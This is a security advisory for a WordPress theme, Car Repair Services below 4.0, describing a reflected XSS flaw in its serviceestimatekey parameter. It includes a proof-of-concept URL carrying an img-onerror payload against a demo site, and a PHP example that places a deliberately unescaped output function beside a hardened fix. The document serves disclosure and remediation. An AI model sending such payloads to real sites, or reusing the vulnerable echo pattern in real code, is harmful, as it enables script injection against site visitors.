
Car Repair Services < 4.0 - Unauthenticated Reflected XSS & XFS

Description

The theme does not properly sanitise its serviceestimatekey search parameter before outputting it back into the page, leading to a reflected Cross-Site Scripting issue.
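To make the flaw concrete, the snippet below is an added illustration written for this README, not code from the Car Repair Services theme: a hypothetical result-page template function that echoes the parameter unescaped, next to the same function hardened with WordPress' own sanitisation and context-specific escaping. Only the parameter name serviceestimatekey comes from the advisory; the function names, markup and query handling are assumed.

```php
<?php
// Added illustration, not the theme's code. The parameter name is from the
// advisory; the function names and markup around it are assumed.

// BEFORE (vulnerable pattern): the raw query-string value is concatenated
// straight into HTML, so any markup present in the URL is rendered by the
// browser instead of being shown as text.
function car_repair_estimate_heading_vulnerable() {
    $key = isset( $_GET['serviceestimatekey'] ) ? $_GET['serviceestimatekey'] : '';
    echo '<h2>Estimate for: ' . $key . '</h2>';
    echo '<input type="text" name="serviceestimatekey" value="' . $key . '">';
}

// AFTER (hardened): sanitise on input and escape on output for the exact
// context the value is written into (HTML text node vs. attribute value).
function car_repair_estimate_heading_fixed() {
    $key = '';
    if ( isset( $_GET['serviceestimatekey'] ) ) {
        // wp_unslash() removes the slashes WordPress adds to request data;
        // sanitize_text_field() strips tags, invalid UTF-8 and line breaks.
        $key = sanitize_text_field( wp_unslash( $_GET['serviceestimatekey'] ) );
    }
    // Sanitisation is not context-aware, so output escaping is still required:
    // esc_html() encodes <, >, &, " and ' for text content ...
    echo '<h2>Estimate for: ' . esc_html( $key ) . '</h2>';
    // ... and esc_attr() does the same for a quoted attribute value.
    echo '<input type="text" name="serviceestimatekey" value="' . esc_attr( $key ) . '">';
}
```

The XFS (cross-frame scripting) half of the title is a separate framing concern, mitigated at the response level with an X-Frame-Options header or a Content-Security-Policy frame-ancestors directive rather than by the escaping shown here.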

Proof of Concept

https://smartdata.tonytemplates.com/car-repair-service-v4/car1/estimateresult/result?s=&serviceestimatekey=<img+src%3Dx+onerror%3Dalert(`m0ze`)%3B> 